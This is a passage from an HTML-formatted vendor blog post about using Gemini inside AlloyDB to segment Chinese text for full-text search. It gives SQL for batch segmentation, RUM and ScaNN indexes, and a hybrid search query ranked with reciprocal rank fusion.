&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Third-party database extensions&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Extensions like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;zhparser&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pg_jieba&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; add Chinese tokenization to PostgreSQL. However, these are often not supported in fully-managed database environments. They also rely on static dictionaries, which frequently fail to parse modern jargon, brand names, or context-dependent terms correctly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;External preprocessing pipelines&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Exporting text to an external application (such as a Python microservice running &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;jieba&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;spaCy&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to insert spaces before saving it to the database. This pattern introduces substantial ETL complexity, network latency, and data exposure risks by moving your data out of the database tier.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Inadequacy of rule-based and dictionary-driven segmentation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Traditional tokenizers rely on static dictionaries and hand-coded syntactic rules to split text. They often struggle to resolve semantic ambiguity, where the exact same sequence of characters must be segmented differently depending on the context. To perform accurate segmentation, you need the world knowledge and contextual intelligence of a large language model like Gemini.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;In-database pre-processing with Gemini&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AlloyDB AI bypasses these workarounds — and their limits — by introducing native, in-database AI Functions like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.generate()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This allows you to call Gemini directly from SQL, keeping your data and intelligence in one place.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This approach provides three core advantages:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;No data movement&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: All text preprocessing and segmentation happen directly within the database engine. This minimizes network latency and keeps your data protected within your database boundaries.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;In-database intelligence&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: You do not need to build, deploy, or maintain external microservices or orchestration frameworks. The database engine coordinates the model calls natively.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Stored procedure-based batching&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: By using a PL/pgSQL stored procedure with array aggregation, you can process rows in parallel batches, unpack the results safely using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;GENERATE_SERIES&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and commit each batch immediately. This prevents database memory exhaustion, bypasses row lock contention, and supports stable, performant execution even when handling massive tables.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Implementing semantic word segmentation&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To implement this solution, we will create a database table where the raw content, the segmented text, the search vector, and the vector embeddings are stored together.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;CREATE TABLE documents (\r\n    id SERIAL PRIMARY KEY,\r\n    title TEXT NOT NULL,\r\n    original_content TEXT NOT NULL,\r\n    content_segmented TEXT,\r\n    search_vector tsvector GENERATED ALWAYS AS (to_tsvector(&amp;#x27;english&amp;#x27;, content_segmented)) STORED,\r\n    embedding vector(3072) GENERATED ALWAYS AS (embedding(&amp;#x27;gemini-embedding-001&amp;#x27;, content_segmented)) STORED\r\n);&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0e8f0ac0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By defining &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;search_vector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;embedding&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; as generated columns, AlloyDB automatically updates both the full-text search index and the vector embeddings whenever the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;content_segmented&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; column is updated. This reduces your application-side logic to a single update statement.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 1: Document batch segmentation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you consult the AlloyDB AI documentation, it recommends using cursor-based processing when dealing with large datasets (10,000 to millions of rows) to avoid memory bottlenecks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, the documentation’s cursor examples focus on append-only operations — streaming text into a new, empty table using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;INSERT&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Our use case requires an &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;in-place &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;UPDATE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; on our live &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;documents&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; table. Implementing this with a raw cursor loop in a standard anonymous block (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DO $$&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) introduces three important production hazards: &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;excessive row locking&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; that freezes live applications, a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;rollback risk&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; if a network blip occurs, and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;alignment risks&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; where parallel cursors fall out of step.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To mitigate these challenges and accelerate performance, we use a stored procedure configured with high-throughput array-based batching:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;CREATE OR REPLACE PROCEDURE segment_all_documents(p_batch_size INT DEFAULT 100)\r\nLANGUAGE plpgsql AS $$\r\nDECLARE\r\n    v_processed_count INT;\r\nBEGIN\r\n    LOOP\r\n        -- 1. Grab a single isolated batch, aggregate into arrays, and call Gemini.\r\n        -- We explicitly ORDER BY id during aggregation to guarantee the arrays match perfectly.\r\n        WITH batch_raw AS (\r\n            SELECT id, original_content\r\n            FROM documents\r\n            WHERE content_segmented IS NULL OR content_segmented = &amp;#x27;&amp;#x27;\r\n            ORDER BY id\r\n            LIMIT p_batch_size\r\n        ),\r\n        batch_processed AS (\r\n            SELECT \r\n                ARRAY_AGG(id ORDER BY id) AS target_ids,\r\n                ai.generate(\r\n                    prompts =&amp;gt; ARRAY_AGG(&amp;#x27;Perform Chinese word segmentation (分词) on the provided text to prepare it for full-text search indexing.\r\nRules:\r\n- Insert a single space between every atomic, meaningful word.\r\n- Separate all punctuation marks (both full-width and half-width) with spaces.\r\n- Preserve the original structure, line breaks, and non-Chinese characters (e.g., English words, numbers).\r\n- Output ONLY the processed text. Do not include any greetings, explanations, or formatting wrappers like markdown code blocks unless they exist in the original text.\r\nText to process: &amp;#x27; || original_content ORDER BY id),\r\n                    model_id =&amp;gt; &amp;#x27;gemini-2.5-flash-lite&amp;#x27;\r\n                ) AS ai_outputs\r\n            FROM batch_raw\r\n        ),\r\n        -- 2. Use GENERATE_SERIES to unpack the paired array indexes safely\r\n        unpivoted_results AS (\r\n            SELECT \r\n                b.target_ids[i] AS doc_id,\r\n                b.ai_outputs[i] AS segmented_text\r\n            FROM batch_processed b,\r\n            GENERATE_SERIES(1, COALESCE(ARRAY_LENGTH(b.target_ids, 1), 0)) i\r\n        )\r\n        -- 3. Execute the batch update for this chunk\r\n        UPDATE documents d\r\n        SET content_segmented = r.segmented_text\r\n        FROM unpivoted_results r\r\n        WHERE d.id = r.doc_id;\r\n\r\n        -- Check how many rows were updated in this pass\r\n        GET DIAGNOSTICS v_processed_count = ROW_COUNT;\r\n\r\n        -- If the update affected 0 rows, it means the whole table is finished\r\n        EXIT WHEN v_processed_count = 0;\r\n\r\n        -- 4. Commit immediately to save progress and release row locks!\r\n        COMMIT;\r\n        \r\n        RAISE NOTICE &amp;#x27;Successfully processed and committed a batch of % rows.&amp;#x27;, v_processed_count;\r\n    END LOOP;\r\nEND $$;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0e8f0760&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To run this preprocessing pipeline across your entire table, simply call the stored procedure:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;CALL segment_all_documents(100);&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0e8f0b80&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This stored procedure approach provides three benefits that directly solve your production challenges:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Parallelized array aggregation (solving the sequential bottleneck)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: By aggregating the batch into arrays and calling &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ai.generate(prompts =&amp;gt; ...)&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with the array, AlloyDB batches the model requests and executes them in parallel. This is faster than processing rows one-by-one sequentially.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Safe index-based unpacking (solving cursor desync)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;GENERATE_SERIES&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to unpack the array indexes maps the model output back to the correct document ID, reducing the risk of parallel streams falling out of step.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Immediate commits and lock release (solving blocking and rollback risks)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Committing the transaction at the end of each loop iteration (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;COMMIT;&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) is an essential optimization. It immediately saves progress to disk and releases row locks, preventing long-running transactions from freezing your live application and ensuring a network blip won't roll back hours of work.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once this pipeline runs, our example sentence is stored in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;content_segmented&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; as: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;"你们 研究所 有 十个 图书馆"&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 2: Choosing simple vs. english&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When defining your &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;tsvector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; generated column, you must choose the appropriate PostgreSQL text search configuration. This choice depends on your dataset:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;When to use &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;simple&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: If your database contains only Chinese text, the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;simple&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; configuration is ideal. It converts text to lowercase but does not perform stemming or default stop-word removal. Since the model prompt already handles semantic segmentation and custom stop-word filtering, the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;simple&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; configuration maps directly to the model's optimized output without further modification.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;When to use &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;english&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: In modern enterprise applications, Chinese documentation and user queries frequently contain embedded English terms (e.g., product codes, brand names, or technical terms). In these bilingual scenarios, the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;english&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; configuration is superior. The English Porter stemmer leaves non-ASCII Chinese characters completely intact as exact lexemes, while automatically normalizing the English terms (e.g., stemming "running" to "run") and filtering out generic English stop words ("the", "and"). This achieves unified bilingual search capabilities without requiring separate columns or complex routing logic.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 3: Query-time preprocessing&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Segmenting the document content is only half the battle. To match the indexed data, the incoming search queries must be pre-processed using the same Gemini-based segmentation logic.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We can take this a step further to improve search precision. We can instruct the model to act as an intelligent stop-word filter, stripping away low-value grammatical noise that would otherwise clutter your search results:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Grammatical particles (e.g., 的, 了)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pronouns (e.g., 你, 我们)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Comparison words (e.g., 比, 最)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Question words (e.g., 怎么, 为什么)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, we can process a user query on the fly using a SQL query:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT ai.generate(\r\n    &amp;#x27;Perform Chinese word segmentation (分词) on the provided search query.\r\n    Additionally, remove low-value grammatical noise such as particles (e.g., 的, 了), pronouns (e.g., 你, 我们), comparison words (e.g., 比, 最), and question words (e.g., 怎么, 为什么).\r\n    Rules:\r\n    - Insert a single space between every remaining meaningful word.\r\n    - Output ONLY the processed keywords. Do not include greetings or explanations.\r\n    Query to process: 你们研究所的图书馆在哪里？&amp;#x27;\r\n);&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0e8f0790&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The model processes this query and returns the keyword string: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;"研究所 图书馆"&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 4: executing the search with RUM&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With your documents segmented and indexed, you can create a RUM index on your generated &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;search_vector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; column. A RUM index is an index type that stores lexeme positions directly. This helps AlloyDB calculate search relevance and word distance directly within the index, avoiding the slow re-scan operations required by traditional GIN indexes.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;CREATE INDEX idx_docs_rum\r\nON documents\r\nUSING rum (search_vector rum_tsvector_ops);&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0e8f0c40&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To run a search, you convert your preprocessed query string ("研究所 图书馆") into a search query using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;plainto_tsquery&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and execute it against the RUM index. You can use the RUM distance operator (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;&amp;lt;=&amp;gt;&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to sort the results by relevance:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT id, title, original_content,\r\n       search_vector &amp;lt;=&amp;gt; plainto_tsquery(&amp;#x27;english&amp;#x27;, &amp;#x27;研究所 &amp;amp; 图书馆&amp;#x27;) AS distance\r\nFROM documents\r\nWHERE search_vector @@ plainto_tsquery(&amp;#x27;english&amp;#x27;, &amp;#x27;研究所 &amp;amp; 图书馆&amp;#x27;)\r\nORDER BY distance ASC;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0e8f0670&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because the RUM index calculates the distance score directly, this query executes with high efficiency, returning relevant matches in milliseconds.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Extending to hybrid search&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While keyword-based text search is excellent for finding exact matches, it can miss relevant documents that use different terminology. To solve this, you can combine your segmented full-text search with semantic vector search using the multilingual &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemini-embedding-001&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; model. This pattern, known as hybrid search, retrieves results that are both lexically and semantically relevant.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AlloyDB makes it easy to run hybrid search. You can create a ScaNN index (Google's vector index technology) on your embedding column and combine it with your RUM index.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Creating the ScaNN index&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To accelerate your vector search, you create a ScaNN index on the embedding column:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;CREATE EXTENSION IF NOT EXISTS alloydb_scann;\r\n\r\nCREATE INDEX idx_docs_scann\r\nON documents\r\nUSING scann (embedding cosine);&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0e8f0f40&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Running the hybrid search query&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To combine the results of your vector and text searches, you can use a SQL query that implements Reciprocal Rank Fusion (RRF). RRF is a rank-based algorithm that merges multiple search result lists into a single, unified list by assigning a score to each document based on its rank in the individual lists.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The following query performs both searches in parallel using Common Table Expressions (CTEs), joins the results using a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;FULL OUTER JOIN&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and calculates the final RRF score:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;WITH vector_search AS (\r\n    SELECT id,\r\n        RANK() OVER (ORDER BY embedding &amp;lt;=&amp;gt; ai.embedding(&amp;#x27;gemini-embedding-001&amp;#x27;, &amp;#x27;研究所 图书馆&amp;#x27;)::vector) AS rank\r\n    FROM documents\r\n    ORDER BY embedding &amp;lt;=&amp;gt; ai.embedding(&amp;#x27;gemini-embedding-001&amp;#x27;, &amp;#x27;研究所 图书馆&amp;#x27;)::vector\r\n    LIMIT 10\r\n),\r\ntext_search AS (\r\n    SELECT id,\r\n        RANK() OVER (ORDER BY search_vector &amp;lt;=&amp;gt; plainto_tsquery(&amp;#x27;english&amp;#x27;, &amp;#x27;研究所 &amp;amp; 图书馆&amp;#x27;)) AS rank\r\n    FROM documents\r\n    WHERE search_vector @@ plainto_tsquery(&amp;#x27;english&amp;#x27;, &amp;#x27;研究所 &amp;amp; 图书馆&amp;#x27;)\r\n    ORDER BY search_vector &amp;lt;=&amp;gt; plainto_tsquery(&amp;#x27;english&amp;#x27;, &amp;#x27;研究所 &amp;amp; 图书馆&amp;#x27;)\r\n    LIMIT 10\r\n)\r\nSELECT\r\n    COALESCE(vector_search.id, text_search.id) AS id,\r\n    COALESCE(1.0 / (60 + vector_search.rank), 0.0) + COALESCE(1.0 / (60 + text_search.rank), 0.0) AS rrf_score\r\nFROM vector_search\r\nFULL OUTER JOIN text_search ON vector_search.id = text_search.id\r\nORDER BY rrf_score DESC\r\nLIMIT 5;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0e8f0190&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this query:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vector_search&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CTE uses the ScaNN index to find the top 10 documents that are semantically closest to your query, using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemini-embedding-001&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; model.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;text_search&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CTE uses the RUM index to find the top 10 documents that match your segmented keywords, using the RUM distance operator for ranking.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The final select statement joins these lists and calculates the RRF score using the standard constant of 60. The top 5 results are returned, providing a precise blend of exact keyword matches and semantic matches.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Why AlloyDB AI is ideal for search&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By using AlloyDB AI to solve the challenges of multilingual and hybrid search, you build a robust, scalable, and cost-effective foundation for your enterprise AI applications.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Native, in-database intelligence&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: By running model processing directly within &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;AlloyDB AI&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, you avoid the cost, latency, and data exposure risks of moving transactional data to external AI services.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enterprise-grade search performance&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Combining &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;ScaNN&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; vector search (built on Google's search technology) and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;RUM&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; full-text search in a single relational database delivers fast, accurate search outcomes without needing to maintain separate, complex search engines.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;High context-aware accuracy&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Unlike static, rule-based dictionaries that struggle with modern terminology, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;'s world knowledge brings deep semantic understanding to word segmentation, providing high search precision.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
